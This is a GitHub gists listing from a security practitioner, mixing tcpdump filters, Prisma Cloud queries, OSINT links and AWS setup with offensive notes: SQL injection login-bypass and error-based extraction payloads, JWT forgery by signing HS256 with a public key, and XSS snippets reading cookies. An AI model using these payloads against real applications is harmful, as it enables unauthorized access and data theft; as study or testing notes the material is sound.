Dustin Butterworth dustinbutterworth

@dustinbutterworth
dustinbutterworth / keybase.md
Created September 26, 2019 00:26
Keybase gist

Keybase proof

I hereby claim:

  • I am dustinbutterworth on github.
  • I am dbutterworth (https://keybase.io/dbutterworth) on keybase.
  • I have a public key ASDCBDTBXEIX_HgXk-xsI8G_3L-KQg_US9lhdLCn44qDrgo

To claim this, I am signing this object:

dustinbutterworth / butters-tcpdump
Created September 26, 2019 00:47
Helpful tcpdump commands
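# tcpdump for HTTP on port 80, printing request/response headers and body as ASCII (-A).
# The filter matches any IPv4 packet on port 80 that carries a TCP payload
# (IP total length minus IP header length minus TCP header length is non-zero), so it is not limited to GET:
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
# Same filter with -X, which prints each packet in hex and ASCII (useful for POST bodies that are not plain text):
tcpdump -X -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'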
dustinbutterworth / rql-snippets.txt
Created November 22, 2019 18:24
Useful RQL Queries for Prisma Cloud
# To stop Prisma Cloud alerting on a resource whose PrismaCloudMonitored tag is set to 'no',
# while still alerting on resources that do not have this tag at all, append this to your existing query:
and ((tags[?(@.key=='PrismaCloudMonitored' && @.value!='no')] size > 0) or (tags[*].key does not contain PrismaCloudMonitored))
# To stop Prisma Cloud alerting on SQL Express, since SQL Express cannot be encrypted:
json.rule="(engine does not contain 'sqlserver-ex') and (dbiResourceId does not equal null and storageEncrypted is false)"
dustinbutterworth / sqli-union-login.txt
Last active January 31, 2022 11:30
SQLi UNION For Login Bypass
username=' UNION SELECT "butters" as password FROM admins WHERE '1' = '1
password=butters
username=foo' OR (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
shows table name admin
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
gives id row
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
gives username row
dustinbutterworth / shodan_api_query.py
Created July 6, 2020 14:23 — forked from LuD1161/shodan_api_query.py
Query Shodan API : Plain and Simple
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
# Browser-like request headers sent with each API call
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
}
dustinbutterworth / JavascriptTomfoolery.js
Last active July 21, 2020 01:47
Javascript Tomfoolery
// Show hostname
window.location.hostname
// show cookie
document.cookie
// background color
document.body.style.backgroundColor = "red"
// IP and Port Scan with javascript - XSS Playground
dustinbutterworth / JWTTomfoolery.txt
Last active July 21, 2020 19:26
JWTTomfoolery.txt
# Convert the public key file to a single-line hex string so openssl will accept it as a key
cat "$FILE" | xxd -p | tr -d "\\n"
# Use openssl to compute an HS256 (HMAC-SHA256) signature over $JWT with that hex key
echo -n "$JWT" | openssl dgst -sha256 -mac HMAC -macopt "hexkey:$HEX_OF_PUBLIC_KEY"
# Decode the hex digest to binary data, then re-encode it in base64
#!/usr/bin/env python3
import base64, binascii
dustinbutterworth / centosCurl.sh
Created July 27, 2020 15:35
Curl Search for latest package on Centos Repo
curl -s http://mirror.centos.org/centos/7/os/x86_64/Packages/ | grep ipa-client | cut -d '"' -f 12
dustinbutterworth / OSINTResources.txt
Last active January 30, 2024 06:16
OSINT Resources
Credit to @fuxksniper (https://twitter.com/fuxksniper/status/1290710096524144640):
http://grep.app
http://hunter.io
https://cxsecurity.com
https://exploit.in
https://xposedornot.com/phpvatch/
https://gcc.godbolt.org
https://2018.zeronights.ru/en/materials/
https://openpentest.com/find-subdomains
dustinbutterworth / AwsSsmSessionManagerTomfoolery.sh
Created August 6, 2020 19:15
AWS SSM Session Manager Tomfoolery
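#!/usr/bin/env bash
# Target EC2 instance ID (redacted here; set to your own instance)
instance_id="i-***************"
# Download and install AWS CLI v2
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
# Download and install the Session Manager plugin (RPM-based distributions)
curl "https://s3.amazonaws.com/session-manager-downloads/plugin/latest/linux_64bit/session-manager-plugin.rpm" -o "session-manager-plugin.rpm"
sudo yum install session-manager-plugin.rpm -y
# Start an interactive Session Manager session on the instance
/usr/local/bin/aws ssm start-session --target "$instance_id"
# Cleanup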